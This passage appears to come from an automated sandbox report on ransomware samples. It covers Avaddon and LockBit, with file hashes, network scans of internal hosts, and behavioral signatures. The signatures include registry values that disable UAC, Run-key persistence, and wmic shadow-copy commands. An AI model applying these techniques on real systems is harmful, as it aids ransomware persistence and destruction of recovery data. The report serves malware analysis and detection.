| N/A | 10.127.1.125:135 | | tcp |
| N/A | 10.127.1.126:135 | | tcp |
| N/A | 10.127.1.151:135 | | tcp |
| N/A | 10.127.1.150:135 | | tcp |
| N/A | 10.127.1.149:135 | | tcp |
| N/A | 10.127.1.148:135 | | tcp |
| N/A | 10.127.1.147:135 | | tcp |
| N/A | 10.127.1.146:135 | | tcp |
| N/A | 10.127.1.145:135 | | tcp |
| N/A | 10.127.1.144:135 | | tcp |
| N/A | 10.127.1.138:135 | | tcp |
| N/A | 10.127.1.152:135 | | tcp |
| N/A | 10.127.1.136:135 | | tcp |
| N/A | 10.127.1.135:135 | | tcp |
| N/A | 10.127.1.134:135 | | tcp |
| N/A | 10.127.1.133:135 | | tcp |
| N/A | 10.127.1.132:135 | | tcp |
| N/A | 10.127.1.131:135 | | tcp |
| N/A | 10.127.1.130:135 | | tcp |
| N/A | 10.127.1.129:135 | | tcp |
| N/A | 10.127.1.128:135 | | tcp |
| N/A | 10.127.1.119:135 | | tcp |
| N/A | 10.127.1.120:135 | | tcp |
| N/A | 10.127.1.121:135 | | tcp |
| N/A | 10.127.1.127:135 | | tcp |
| N/A | 10.127.1.105:135 | | tcp |
| N/A | 10.127.1.108:135 | | tcp |
| N/A | 10.127.1.112:135 | | tcp |
| N/A | 10.127.1.113:135 | | tcp |
| N/A | 10.127.1.114:135 | | tcp |
| N/A | 10.127.1.116:135 | | tcp |
| N/A | 10.127.1.106:135 | | tcp |
| N/A | 10.127.1.109:135 | | tcp |
| N/A | 10.127.1.110:135 | | tcp |
| N/A | 10.127.1.111:135 | | tcp |
| N/A | 10.127.1.115:135 | | tcp |
| N/A | 10.127.1.117:135 | | tcp |
| N/A | 10.127.1.122:135 | | tcp |
| N/A | 10.127.1.107:135 | | tcp |
| N/A | 10.127.1.86:135 | | tcp |
| N/A | 10.127.1.90:135 | | tcp |
| N/A | 10.127.1.91:135 | | tcp |
| N/A | 10.127.1.92:135 | | tcp |
| N/A | 10.127.1.93:135 | | tcp |
| N/A | 10.127.1.94:135 | | tcp |
| N/A | 10.127.1.87:135 | | tcp |
| N/A | 10.127.1.88:135 | | tcp |
| N/A | 10.127.1.89:135 | | tcp |
| N/A | 10.127.1.95:135 | | tcp |
| N/A | 10.127.1.96:135 | | tcp |
| N/A | 10.127.1.98:135 | | tcp |
| N/A | 10.127.1.101:135 | | tcp |
| N/A | 10.127.1.102:135 | | tcp |
| N/A | 10.127.1.104:135 | | tcp |
| N/A | 10.127.1.97:135 | | tcp |
| N/A | 10.127.1.99:135 | | tcp |
| N/A | 10.127.1.100:135 | | tcp |
| N/A | 10.127.1.103:135 | | tcp |
| N/A | 10.127.1.72:135 | | tcp |
| N/A | 10.127.1.73:135 | | tcp |
| N/A | 10.127.1.74:135 | | tcp |
| N/A | 10.127.1.75:135 | | tcp |
| N/A | 10.127.1.76:135 | | tcp |
| N/A | 10.127.1.81:135 | | tcp |
| N/A | 10.127.1.82:135 | | tcp |
| N/A | 10.127.1.83:135 | | tcp |
| N/A | 10.127.1.84:135 | | tcp |
| N/A | 10.127.1.85:135 | | tcp |
| N/A | 10.127.1.77:135 | | tcp |
| N/A | 10.127.1.78:135 | | tcp |
| N/A | 10.127.1.79:135 | | tcp |
| N/A | 10.127.1.80:135 | | tcp |
| N/A | 10.127.1.61:135 | | tcp |
| N/A | 10.127.1.64:135 | | tcp |
| N/A | 10.127.1.65:135 | | tcp |
| N/A | 10.127.1.66:135 | | tcp |
| N/A | 10.127.1.67:135 | | tcp |
| N/A | 10.127.1.68:135 | | tcp |
| N/A | 10.127.1.69:135 | | tcp |
| N/A | 10.127.1.70:135 | | tcp |
| N/A | 10.127.1.71:135 | | tcp |
| N/A | 10.127.1.60:135 | | tcp |
| N/A | 10.127.1.62:135 | | tcp |
| N/A | 10.127.1.63:135 | | tcp |
| N/A | 10.127.1.45:135 | | tcp |
| N/A | 10.127.1.49:135 | | tcp |
| N/A | 10.127.1.50:135 | | tcp |
| N/A | 10.127.1.51:135 | | tcp |
| N/A | 10.127.1.52:135 | | tcp |
| N/A | 10.127.1.55:135 | | tcp |
| N/A | 10.127.1.56:135 | | tcp |
| N/A | 10.127.1.59:135 | | tcp |
| N/A | 10.127.1.46:135 | | tcp |
| N/A | 10.127.1.47:135 | | tcp |
| N/A | 10.127.1.48:135 | | tcp |
| N/A | 10.127.1.53:135 | | tcp |
| N/A | 10.127.1.54:135 | | tcp |
| N/A | 10.127.1.57:135 | | tcp |
| N/A | 10.127.1.58:135 | | tcp |
| N/A | 10.127.1.34:135 | | tcp |
| N/A | 10.127.1.40:135 | | tcp |
| N/A | 10.127.1.41:135 | | tcp |
| N/A | 10.127.1.42:135 | | tcp |
| N/A | 10.127.1.43:135 | | tcp |
| N/A | 10.127.1.44:135 | | tcp |
| N/A | 10.127.1.33:135 | | tcp |
| N/A | 10.127.1.35:135 | | tcp |
| N/A | 10.127.1.36:135 | | tcp |
| N/A | 10.127.1.26:135 | | tcp |
| N/A | 10.127.1.30:135 | | tcp |
| N/A | 10.127.1.31:135 | | tcp |
| N/A | 10.127.1.32:135 | | tcp |
| N/A | 10.127.1.37:135 | | tcp |
| N/A | 10.127.1.38:135 | | tcp |
| N/A | 10.127.1.39:135 | | tcp |
| N/A | 10.127.1.25:135 | | tcp |
| N/A | 10.127.1.27:135 | | tcp |
| N/A | 10.127.1.28:135 | | tcp |
| N/A | 10.127.1.29:135 | | tcp |
| N/A | 10.127.1.6:135 | | tcp |
| N/A | 10.127.1.7:135 | | tcp |
| N/A | 10.127.1.8:135 | | tcp |
| N/A | 10.127.1.9:135 | | tcp |
| N/A | 10.127.1.10:135 | | tcp |
| N/A | 10.127.1.11:135 | | tcp |
| N/A | 10.127.1.18:135 | | tcp |
| N/A | 10.127.1.19:135 | | tcp |
| N/A | 10.127.1.20:135 | | tcp |
| N/A | 10.127.1.22:135 | | tcp |
| N/A | 10.127.1.23:135 | | tcp |
| N/A | 10.127.1.24:135 | | tcp |
| N/A | 10.127.1.2:135 | | tcp |
| N/A | 10.127.1.4:135 | | tcp |
| N/A | 10.127.1.5:135 | | tcp |
| N/A | 10.127.1.12:135 | | tcp |
| N/A | 10.127.1.13:135 | | tcp |
| N/A | 10.127.1.14:135 | | tcp |
| N/A | 10.127.1.15:135 | | tcp |
| N/A | 10.127.1.1:135 | | tcp |
| N/A | 10.127.1.16:135 | | tcp |
| N/A | 10.127.1.17:135 | | tcp |
| N/A | 10.127.1.21:135 | | tcp |
| N/A | 10.127.1.0:135 | | tcp |
Files
C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt
| MD5 | f1f9fa7e0ac011f93ea508f6c0c595ef |
| SHA1 | 933ec77d7416e7cbb2d3e30a2250da2259112679 |
| SHA256 | 54bb61b3fa4c51f7a518089987984e77ca4eb2ab4776fa458cb986dff1ddf816 |
| SHA512 | b96b3c5eb97484762a0cb52193ffb900d336edda4034bd57480f9f6e1b38bd2455eef9d058b24ca4b6da10df6b83c1fba549235428614f72df23532a28774fc7 |
C:\Users\Admin\Desktop\LockBit-note.hta
| MD5 | 83b62f624992a5ac6afb087554d25c31 |
| SHA1 | 5bf1c39eb8208e2a48dc6d9fc6f8f6f270e2bcde |
| SHA256 | 1e5f657e4ee5ec3beb3ffe32e4a514194e5617da74aec07eadd587670cf63a8b |
| SHA512 | 47a56042a5d1468ab8fc7609ff67ef23c5639866922953ec7afa391d384f4d28eaa566638f750bf0810747032bb816ed79bd11e5d40db7db06e941fa7cde8846 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1788s
Max time network
1806s
Command Line
Signatures
Avaddon
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Renames multiple (158) files with added filename extension
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2480455240-981575606-1030659066-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 184.26.45.61:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.45.26.184.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | | tcp |
| N/A | 10.127.0.1:139 | | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 10.127.0.2:445 | | tcp |
| N/A | 10.127.0.2:139 | | tcp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | | tcp |
| N/A | 10.127.0.3:139 | | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.4:445 | | tcp |
| N/A | 10.127.0.4:139 | | tcp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.5:445 | | tcp |
| N/A | 10.127.0.5:139 | | tcp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.6:445 | | tcp |
| N/A | 10.127.0.6:139 | | tcp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.7:445 | | tcp |
| N/A | 10.127.0.7:139 | | tcp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | | tcp |
| N/A | 10.127.0.8:139 | | tcp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.9:445 | | tcp |
| N/A | 10.127.0.9:139 | | tcp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.10:445 | | tcp |
| N/A | 10.127.0.10:139 | | tcp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.11:445 | | tcp |
| N/A | 10.127.0.11:139 | | tcp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.12:445 | | tcp |
| N/A | 10.127.0.12:139 | | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.13:445 | | tcp |
| N/A | 10.127.0.13:139 | | tcp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.14:445 | | tcp |
| N/A | 10.127.0.14:139 | | tcp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.15:445 | | tcp |
| N/A | 10.127.0.15:139 | | tcp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | | tcp |
| N/A | 10.127.0.16:139 | | tcp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.17:445 | | tcp |
| N/A | 10.127.0.17:139 | | tcp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.18:445 | | tcp |
| N/A | 10.127.0.18:139 | | tcp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.19:445 | | tcp |
| N/A | 10.127.0.19:139 | | tcp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.20:445 | | tcp |
| N/A | 10.127.0.20:139 | | tcp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.21:445 | | tcp |
| N/A | 10.127.0.21:139 | | tcp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.22:445 | | tcp |
| N/A | 10.127.0.22:139 | | tcp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.23:445 | | tcp |
| N/A | 10.127.0.23:139 | | tcp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.24:445 | | tcp |
| N/A | 10.127.0.24:139 | | tcp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.25:445 | | tcp |
| N/A | 10.127.0.25:139 | | tcp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.26:445 | | tcp |
| N/A | 10.127.0.26:139 | | tcp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.27:445 | | tcp |
| N/A | 10.127.0.27:139 | | tcp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.28:445 | | tcp |
| N/A | 10.127.0.28:139 | | tcp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.29:445 | | tcp |
| N/A | 10.127.0.29:139 | | tcp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.30:445 | | tcp |
| N/A | 10.127.0.30:139 | | tcp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.31:445 | | tcp |
| N/A | 10.127.0.31:139 | | tcp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.32:445 | | tcp |
| N/A | 10.127.0.32:139 | | tcp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.33:445 | | tcp |
| N/A | 10.127.0.33:139 | | tcp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.34:445 | | tcp |
| N/A | 10.127.0.34:139 | | tcp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.35:445 | | tcp |
| N/A | 10.127.0.35:139 | | tcp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.36:445 | | tcp |
| N/A | 10.127.0.36:139 | | tcp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.37:445 | | tcp |
| N/A | 10.127.0.37:139 | | tcp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.38:445 | | tcp |
| N/A | 10.127.0.38:139 | | tcp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.39:445 | | tcp |
| N/A | 10.127.0.39:139 | | tcp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.40:445 | | tcp |
| N/A | 10.127.0.40:139 | | tcp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.41:445 | | tcp |
| N/A | 10.127.0.41:139 | | tcp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.42:445 | | tcp |
| N/A | 10.127.0.42:139 | | tcp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.43:445 | | tcp |
| N/A | 10.127.0.43:139 | | tcp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.44:445 | | tcp |
| N/A | 10.127.0.44:139 | | tcp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.45:445 | | tcp |
| N/A | 10.127.0.45:139 | | tcp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.46:445 | | tcp |
| N/A | 10.127.0.46:139 | | tcp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.47:445 | | tcp |
| N/A | 10.127.0.47:139 | | tcp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.48:445 | | tcp |
| N/A | 10.127.0.48:139 | | tcp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.49:445 | | tcp |
| N/A | 10.127.0.49:139 | | tcp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.50:445 | | tcp |
| N/A | 10.127.0.50:139 | | tcp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.51:445 | | tcp |
| N/A | 10.127.0.51:139 | | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.52:445 | | tcp |
| N/A | 10.127.0.52:139 | | tcp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.53:445 | | tcp |
| N/A | 10.127.0.53:139 | | tcp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.54:445 | | tcp |
| N/A | 10.127.0.54:139 | | tcp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.55:445 | | tcp |
| N/A | 10.127.0.55:139 | | tcp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.56:445 | | tcp |
| N/A | 10.127.0.56:139 | | tcp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.57:445 | | tcp |
| N/A | 10.127.0.57:139 | | tcp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.58:445 | | tcp |
| N/A | 10.127.0.58:139 | | tcp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.59:445 | | tcp |
| N/A | 10.127.0.59:139 | | tcp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.60:445 | | tcp |
| N/A | 10.127.0.60:139 | | tcp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.61:445 | | tcp |
| N/A | 10.127.0.61:139 | | tcp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.62:445 | | tcp |
| N/A | 10.127.0.62:139 | | tcp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.63:445 | | tcp |
| N/A | 10.127.0.63:139 | | tcp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.64:445 | | tcp |
| N/A | 10.127.0.64:139 | | tcp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.65:445 | | tcp |
| N/A | 10.127.0.65:139 | | tcp |
Files
C:\Users\Admin\Desktop\032422-readme.html
| MD5 | 57fa8637b235e5993918ef1bea17705e |
| SHA1 | 7afae622daff5fd49e890478a0f2c78c61f35576 |
| SHA256 | dea9c5e92641b2ee485d347aef2127c2fcefb9a86e46708cdc71f601fa6b32db |
| SHA512 | 98d659189d050257228ded2471cf1bf62c396f1a5d7f273ac64632eec2e019c4ac8a212cd1fc77e1b8de93b085c18670ea06b199ba36a98f3b5bcfdbab926bb9 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1563s
